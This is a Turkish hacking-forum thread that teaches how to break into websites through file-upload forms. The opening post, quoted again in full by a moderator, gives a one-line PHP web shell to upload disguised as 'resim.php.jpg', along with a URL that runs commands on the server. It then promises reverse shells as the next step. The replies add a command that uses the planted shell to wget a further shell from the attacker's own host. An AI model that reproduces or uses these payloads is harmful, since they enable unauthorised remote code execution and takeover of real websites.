Hoşgeldin Misafir

Dosya yükleme yerinden siteyi hacklemek File Upload RCE

xS0N3R

23 Ağu 2020
5,427 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
shutterstock_2014352003-2.jpg



Yazıda bahsedilen payload dosyalarını hazır halleri bunları sunucuya yükle ve bağlantıyı bekle
şimdi bu uzaktan kod yürütmemizi sağlayan açık herhangi bir sitenin mesela dosya paylaşımı için dosya yükleme yerinde veya chat kısmında dosya yükleme yerinde hatta daha ileri seviyede direk kişiye fotoğraf atarak bile ola bilri biz şimdi burda sitede dosya yükleme yerlerinde eğer bir zafiyet varsa bunu nasıl sömürürüz ona bakacaz

öncelikle bi bakalım öyle bir açık sitede var mı diyebir php dosyası oluşturlaım ve içine şu kodu yazalım

Kod:
&lt;?php system($_GET['cmd']); ?&gt;<br>

sonra dosyayı kaydedip sunucuya atalım ve url ye şunu girin ama şunu unutmayın herzaman /upload dizininde olacak diye bir şey yok resmin bağlantısına bakın ve ona göre sonuna ?cmd=whoami şunu koyun (siteye yükledikten sonra)

Kod:
https://site.com/uploads/resim.php.jpg?cmd=whoami

eğerki sitede öyle bir açık varsa size bir kullanıcı dödürür bir yazı root veya kali yada başka bir kullanıcı bunu döndürdüyse geçmiş olsun sitenin içinden bile geçeriz

eğerki bu kodu yazınca çalışıyorsa daha yüksek kodlar yazmamız gerekir reverse shell için direk sunucya sızmak için
 

n0va

26 Haz 2020
1,803 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
https://site.com/uploads/resim.php.jpg?cmd=wget sizinshelladresiniz.com/shell.php dosyasını açık bir şekilde txt tarzında veya github RAW şeklinde yazarsanız adres çubuğuna, bu URL'ye shelli resim.php.jpg dizinine indirirsiniz. Fakat php.jpg dosyasını sistemin kabul etmesi lazım ki bu çok zor bi ihtimal günümüzdeki sunucu yapılandırmalarında artık.

Teşekkürler katkınız için.
 

DeepiMpaCt

DeepiMpaCt

Katip ol sabahin ilk isiklarina..
Monteal/Ca
25 Ağu 2017
6,151 Mesaj
TIM Görevleri
2

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
https://site.com/uploads/resim.php.jpg?cmd=wget sizinshelladresiniz.com/shell.php dosyasını açık bir şekilde txt tarzında veya github RAW şeklinde yazarsanız adres çubuğuna, bu URL'ye shelli resim.php.jpg dizinine indirirsiniz. Fakat php.jpg dosyasını sistemin kabul etmesi lazım ki bu çok zor bi ihtimal günümüzdeki sunucu yapılandırmalarında artık.

Teşekkürler katkınız için.
Fonksiyonlari engellemeyen sysadmin'de ne bileyim..
 

Graves

Graves

Karanlık Özgürlüktür
Moderator
9 Eki 2024
10,458 Mesaj
TIM Görevleri
2

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
shutterstock_2014352003-2.jpg



Yazıda bahsedilen payload dosyalarını hazır halleri bunları sunucuya yükle ve bağlantıyı bekle
şimdi bu uzaktan kod yürütmemizi sağlayan açık herhangi bir sitenin mesela dosya paylaşımı için dosya yükleme yerinde veya chat kısmında dosya yükleme yerinde hatta daha ileri seviyede direk kişiye fotoğraf atarak bile ola bilri biz şimdi burda sitede dosya yükleme yerlerinde eğer bir zafiyet varsa bunu nasıl sömürürüz ona bakacaz

öncelikle bi bakalım öyle bir açık sitede var mı diyebir php dosyası oluşturlaım ve içine şu kodu yazalım

Kod:
&lt;?php system($_GET['cmd']); ?&gt;<br>

sonra dosyayı kaydedip sunucuya atalım ve url ye şunu girin ama şunu unutmayın herzaman /upload dizininde olacak diye bir şey yok resmin bağlantısına bakın ve ona göre sonuna ?cmd=whoami şunu koyun (siteye yükledikten sonra)

Kod:
https://site.com/uploads/resim.php.jpg?cmd=whoami

eğerki sitede öyle bir açık varsa size bir kullanıcı dödürür bir yazı root veya kali yada başka bir kullanıcı bunu döndürdüyse geçmiş olsun sitenin içinden bile geçeriz

eğerki bu kodu yazınca çalışıyorsa daha yüksek kodlar yazmamız gerekir reverse shell için direk sunucya sızmak için
Teşekkürler